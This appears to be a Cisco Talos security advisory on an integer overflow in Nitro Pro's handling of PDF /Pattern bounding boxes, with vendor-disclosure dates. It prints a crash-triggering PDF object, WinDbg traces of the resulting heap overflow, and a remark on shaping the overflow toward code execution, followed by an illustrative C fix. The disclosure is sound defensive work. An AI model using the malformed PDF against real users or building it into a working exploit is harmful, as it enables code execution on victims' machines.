An exploitable code execution vulnerability exists in the way Nitro Pro 126.96.36.199 parses Pattern objects. A specially crafted PDF file can trigger an integer overflow that can lead to arbitrary code execution. In order to trigger this vulnerability, the victim must open a malicious file.
Nitro Pro 188.8.131.52
8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-190 - Integer Overflow or Wraparound
Nitro PDF allows users to save, read, sign and edit PDF files on their machines.
The PDF standard allows for creating geometrical patterns that can be tiled and used to draw other shapes. These are specified via /Pattern objects and can be used inside PDF content streams. An important property of a /Pattern object is the /BBox property, which specifies the bounding box rectangle that will contain the pattern. There exists an integer overflow in the way NitroPDF parses the dimensions of this bounding box, which can be triggered via the following sample:
11 0 obj
<<
  /Type /Pattern
  /PatternType 1
  /PaintType 1
  /TilingType 1
  /BBox [4294967295 0 0 1]
  /XStep 1
  /YStep 1
  /Length 56
>>
stream
q (AAAA)Tj Q
endstream
endobj
Notice, in the above object, the abnormally large value of the first coordinate of the /BBox property. While parsing the /Pattern object, this value is used in a number of floating point calculations and is ultimately truncated to 0x80000000 when converting from a floating point to an integer value:
00007ffa`f10f7dce f20f2cc0        cvttsd2si eax,xmm0
00007ffa`f10f7dd2 89842428010000  mov     dword ptr [rsp+128h],eax
00007ffa`f10f7dd9 f20f2cc6        cvttsd2si eax,xmm6
00007ffa`f10f7ddd 89842424010000  mov     dword ptr [rsp+124h],eax
0:000> ?xmm6
Evaluate expression: 4755801206503243776 = 42000000`00000000
0:000> ?eax
Evaluate expression: 2147483648 = 00000000`80000000
Continuing the execution from the above point leads to the following loop:
00007ffa`f10f9d40 c740feffffff00  mov     dword ptr [rax-2],0FFFFFFh
00007ffa`f10f9d47 488d4004        lea     rax,[rax+4]
00007ffa`f10f9d4b 83c1ff          add     ecx,0FFFFFFFFh
00007ffa`f10f9d4e 75f0            jne     npdf!PDTextIsSpaceBetween+0x14f350 (00007ffa`f10f9d40)
0:000> ?rcx
Evaluate expression: 2147483648 = 00000000`80000000
In the above code, we see a loop that writes to the memory pointed to by rax 4 bytes at a time, with the loop guard in ecx being effectively decremented by 1. The value in ecx is treated as a signed integer and is in this case the most negative value possible, so the first decrement will lead to integer wraparound, which will subsequently lead to a buffer overflow on the heap:
0:000> g
(1170.8b8): Access violation - code c0000005 (first/second chance not available)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
Time Travel Position: 10D7EF2:0
npdf!PDTextIsSpaceBetween+0x14f350:
00007ffa`f10f9d40 c740feffffff00  mov     dword ptr [rax-2],0FFFFFFh ds:000001f7`463fd000=c0c0c0c0
0:000> k 5
 # Child-SP          RetAddr           Call Site
00 0000003b`9c1fc980 00007ffa`f10ef4a0 npdf!PDTextIsSpaceBetween+0x14f350
01 0000003b`9c1fdea0 00007ffa`f0f8bfa7 npdf!PDTextIsSpaceBetween+0x144ab0
02 0000003b`9c1fe410 00007ffa`f0f8d3d7 npdf!init_npdf_optional_features+0x7cc7
03 0000003b`9c1fe4b0 00007ffa`f0f84fca npdf!init_npdf_optional_features+0x90f7
04 0000003b`9c1fe620 00007ffa`f0fa2780 npdf!init_npdf_optional_features+0xcea
0:000> ?rcx
Evaluate expression: 2147483644 = 00000000`7ffffffc
From the above debugger output, we can see that ecx has wrapped around and the increments to rax have resulted in an out-of-bounds write access constituting a buffer overflow. With a careful choice of other /Pattern object parameters, such as YStep, a specific overflow size could be achieved, which could lead to further memory corruption and ultimately arbitrary code execution.
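The following C is an added illustration of the conversion step described above; it is not Talos's or Nitro's code, and the function names and the hypothetical "4 bytes per cell" size computation are assumptions used only to model the behaviour. It contrasts the unchecked float-to-integer truncation (which on x86-64 yields the cvttsd2si "integer indefinite" value 0x80000000 for any out-of-range /BBox coordinate) with a range-checked conversion that refuses such dimensions before any loop count or allocation size is derived from them.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <math.h>

/* Model of the unchecked truncation seen in the advisory. cvttsd2si returns
 * 0x80000000 for NaN or any double outside the int32 range; that result is
 * reproduced explicitly here rather than via a C cast, whose behaviour is
 * undefined for out-of-range inputs. (Hypothetical helper, not Nitro's code.) */
static int32_t naive_trunc_i32(double v)
{
    if (isnan(v) || v >= 2147483648.0 || v < -2147483648.0)
        return INT32_MIN;          /* 0x80000000, as observed in eax */
    return (int32_t)v;
}

/* Hardened conversion: succeeds only when v is finite and fits in int32. */
static bool checked_dim_i32(double v, int32_t *out)
{
    if (!isfinite(v) || v >= 2147483648.0 || v < -2147483648.0)
        return false;
    *out = (int32_t)v;
    return true;
}

/* Hypothetical size computation for a pattern row: one 4-byte cell per unit
 * of the /BBox dimension, mirroring the dword stores in the fill loop above.
 * Returns 0 when the dimension is unusable (out of range, zero or negative),
 * so a signed loop counter can never start at INT32_MIN and wrap. */
static size_t pattern_row_bytes(double bbox_coord)
{
    int32_t cells;
    if (!checked_dim_i32(bbox_coord, &cells) || cells <= 0)
        return 0;
    if ((size_t)cells > SIZE_MAX / 4)   /* overflow-checked multiply */
        return 0;
    return (size_t)cells * 4;
}

int main(void)
{
    /* The advisory's coordinate and the 2^33 value seen in xmm6 */
    printf("naive(4294967295) = %d\n", naive_trunc_i32(4294967295.0));
    printf("naive(2^33)       = %d\n", naive_trunc_i32(8589934592.0));
    printf("checked(4294967295) -> %zu bytes\n", pattern_row_bytes(4294967295.0));
    printf("checked(16)         -> %zu bytes\n", pattern_row_bytes(16.0));
    return 0;
}
```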
2020-02-17 - Vendor Disclosure
2020-05-18 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.